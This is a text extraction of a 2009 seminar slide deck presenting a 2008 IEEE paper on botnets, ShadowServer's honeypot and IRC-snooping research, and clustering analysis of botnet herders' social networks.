![Page 1: Speaker: Hom-Jay Hom Date:2009/11/17 Botnet, and the CyberCriminal Underground IEEE 2008 Hsin chun Chen Clinton J. Mielke II](https://reader036.vdocuments.site/reader036/viewer/2022062314/56649f1b5503460f94c310f1/html5/thumbnails/1.jpg)
Speaker: Hom-Jay Hom
Date:2009/11/17
Botnet, and the CyberCriminal Underground
IEEE 2008
Hsin chun Chen
Clinton J. Mielke II
![Page 2: Speaker: Hom-Jay Hom Date:2009/11/17 Botnet, and the CyberCriminal Underground IEEE 2008 Hsin chun Chen Clinton J. Mielke II](https://reader036.vdocuments.site/reader036/viewer/2022062314/56649f1b5503460f94c310f1/html5/thumbnails/2.jpg)
OutlineBotnats
SHADOW SERVER
Investigating The Botnat World
Further Work
Conclusion
112/04/20 2
![Page 3: Speaker: Hom-Jay Hom Date:2009/11/17 Botnet, and the CyberCriminal Underground IEEE 2008 Hsin chun Chen Clinton J. Mielke II](https://reader036.vdocuments.site/reader036/viewer/2022062314/56649f1b5503460f94c310f1/html5/thumbnails/3.jpg)
Botnats (1/3)The earliest malware
damaging systemprinting taunting messages
Traditional computer virusesSelf-copy themselves.Trojan horses.
WormsScanning and infecting.
112/04/20 3
![Page 4: Speaker: Hom-Jay Hom Date:2009/11/17 Botnet, and the CyberCriminal Underground IEEE 2008 Hsin chun Chen Clinton J. Mielke II](https://reader036.vdocuments.site/reader036/viewer/2022062314/56649f1b5503460f94c310f1/html5/thumbnails/4.jpg)
Infection
DDoS attacks
Spamming
Espionage
Proxies
Clickthrough Fraud
Botnats (2/3)
![Page 5: Speaker: Hom-Jay Hom Date:2009/11/17 Botnet, and the CyberCriminal Underground IEEE 2008 Hsin chun Chen Clinton J. Mielke II](https://reader036.vdocuments.site/reader036/viewer/2022062314/56649f1b5503460f94c310f1/html5/thumbnails/5.jpg)
Botnats (3/3)The Underground Economy
Hidden social network of cybercriminals.
sell their servicesSpammersBot-herdersMalware authorsCriminals gather
Many botnets are actually rented to other criminal organizations
phish attacksstock market pump-and-dump
112/04/20 5
![Page 6: Speaker: Hom-Jay Hom Date:2009/11/17 Botnet, and the CyberCriminal Underground IEEE 2008 Hsin chun Chen Clinton J. Mielke II](https://reader036.vdocuments.site/reader036/viewer/2022062314/56649f1b5503460f94c310f1/html5/thumbnails/6.jpg)
SHADOW SERVER (1/2)ShadowServer
Nonprofit group.
HoneypotsPassively collect malware.
Malware AnalysisPassive:AntiVirus engines.Active:Sandbox.Execute untrustworthy malicious code
112/04/20 6
![Page 7: Speaker: Hom-Jay Hom Date:2009/11/17 Botnet, and the CyberCriminal Underground IEEE 2008 Hsin chun Chen Clinton J. Mielke II](https://reader036.vdocuments.site/reader036/viewer/2022062314/56649f1b5503460f94c310f1/html5/thumbnails/7.jpg)
SHADOW SERVER (2/2)Snooping
Newlydiscovered IRC networks Records all IRC traffic. The IRC logs are analyzedPattern-matching signature system,
112/04/20 7
![Page 8: Speaker: Hom-Jay Hom Date:2009/11/17 Botnet, and the CyberCriminal Underground IEEE 2008 Hsin chun Chen Clinton J. Mielke II](https://reader036.vdocuments.site/reader036/viewer/2022062314/56649f1b5503460f94c310f1/html5/thumbnails/8.jpg)
Investigating The Botnat World (1/9)Dataset Processing
112/04/20 8
ID:
C&C ID
nickmane: IP:
![Page 9: Speaker: Hom-Jay Hom Date:2009/11/17 Botnet, and the CyberCriminal Underground IEEE 2008 Hsin chun Chen Clinton J. Mielke II](https://reader036.vdocuments.site/reader036/viewer/2022062314/56649f1b5503460f94c310f1/html5/thumbnails/9.jpg)
Investigating The Botnat World (2/9)Classify known command strings
DDoS command.Infection event.Password-theft event.
Signature systemAnalyzed and classifiedProduced a compendium of what events
112/04/20 9
![Page 10: Speaker: Hom-Jay Hom Date:2009/11/17 Botnet, and the CyberCriminal Underground IEEE 2008 Hsin chun Chen Clinton J. Mielke II](https://reader036.vdocuments.site/reader036/viewer/2022062314/56649f1b5503460f94c310f1/html5/thumbnails/10.jpg)
Investigating The Botnat World (3/9)1. Nickname Enumeration:
Random numeric IDDictionary
Signature systemBot command strings Produced a sanitized list
112/04/20 10
![Page 11: Speaker: Hom-Jay Hom Date:2009/11/17 Botnet, and the CyberCriminal Underground IEEE 2008 Hsin chun Chen Clinton J. Mielke II](https://reader036.vdocuments.site/reader036/viewer/2022062314/56649f1b5503460f94c310f1/html5/thumbnails/11.jpg)
Investigating The Botnat World (4/9)2. Drone Counting
A simple approachstate tracked in a lookup tableA population counter
A more refined approachIRC eventSnoops channel.
112/04/20 11
![Page 12: Speaker: Hom-Jay Hom Date:2009/11/17 Botnet, and the CyberCriminal Underground IEEE 2008 Hsin chun Chen Clinton J. Mielke II](https://reader036.vdocuments.site/reader036/viewer/2022062314/56649f1b5503460f94c310f1/html5/thumbnails/12.jpg)
Investigating The Botnat World (5/9)
112/04/20 12
600
400
200
白天
晚上Bot ,population
Time
![Page 13: Speaker: Hom-Jay Hom Date:2009/11/17 Botnet, and the CyberCriminal Underground IEEE 2008 Hsin chun Chen Clinton J. Mielke II](https://reader036.vdocuments.site/reader036/viewer/2022062314/56649f1b5503460f94c310f1/html5/thumbnails/13.jpg)
Investigating The Botnat World (6/9)Key Players
The botnet herders by counting their controlled C&CDetect other’s botnet C&C channels Subvert their security mechanisms.
112/04/20 13
![Page 14: Speaker: Hom-Jay Hom Date:2009/11/17 Botnet, and the CyberCriminal Underground IEEE 2008 Hsin chun Chen Clinton J. Mielke II](https://reader036.vdocuments.site/reader036/viewer/2022062314/56649f1b5503460f94c310f1/html5/thumbnails/14.jpg)
Investigating The Botnat World (7/9)Criminal Social Network
Analysis community structureAll pre-filtered ”human” nicknames
C&C channel.Any two nodes found collaborating
Weights were assigned to the edgesJaccard metric measuring
112/04/20 14
![Page 15: Speaker: Hom-Jay Hom Date:2009/11/17 Botnet, and the CyberCriminal Underground IEEE 2008 Hsin chun Chen Clinton J. Mielke II](https://reader036.vdocuments.site/reader036/viewer/2022062314/56649f1b5503460f94c310f1/html5/thumbnails/15.jpg)
Investigating The Botnat World (8/9)Hierarchical agglomerative clustering algorithm
minimum similarity of 50%.957 nicknames.104 clusters
112/04/20 15
![Page 16: Speaker: Hom-Jay Hom Date:2009/11/17 Botnet, and the CyberCriminal Underground IEEE 2008 Hsin chun Chen Clinton J. Mielke II](https://reader036.vdocuments.site/reader036/viewer/2022062314/56649f1b5503460f94c310f1/html5/thumbnails/16.jpg)
Investigating The Botnat World (9/9)Of the 104 clusters
C : C&CD : DDoSB : Bot P : Victim passwords
112/04/20 16
clusters
clusters
![Page 17: Speaker: Hom-Jay Hom Date:2009/11/17 Botnet, and the CyberCriminal Underground IEEE 2008 Hsin chun Chen Clinton J. Mielke II](https://reader036.vdocuments.site/reader036/viewer/2022062314/56649f1b5503460f94c310f1/html5/thumbnails/17.jpg)
Further WorkMany herders will use close variations of a similar nicknames.
Profile behavioral characteristics of herders.
hierarchical clusteringBiclustering or hyperGraph nicknames and channels.
To better profile the DDoS attack motivationsDDoS targets must be individually scrutinized. IP addresses could be correlated with latitude and longitude
112/04/20 17
![Page 18: Speaker: Hom-Jay Hom Date:2009/11/17 Botnet, and the CyberCriminal Underground IEEE 2008 Hsin chun Chen Clinton J. Mielke II](https://reader036.vdocuments.site/reader036/viewer/2022062314/56649f1b5503460f94c310f1/html5/thumbnails/18.jpg)
ConclusionRecent years to encompass world-influencing crimes
Tracking these miscreants and their botnets will become more and more challenging.
individuals to secure themselves
ShadowServer hopes to assist in whatever way we can to make the internet a safer place.
112/04/20 18
![Page 19: Speaker: Hom-Jay Hom Date:2009/11/17 Botnet, and the CyberCriminal Underground IEEE 2008 Hsin chun Chen Clinton J. Mielke II](https://reader036.vdocuments.site/reader036/viewer/2022062314/56649f1b5503460f94c310f1/html5/thumbnails/19.jpg)
END
112/04/20 19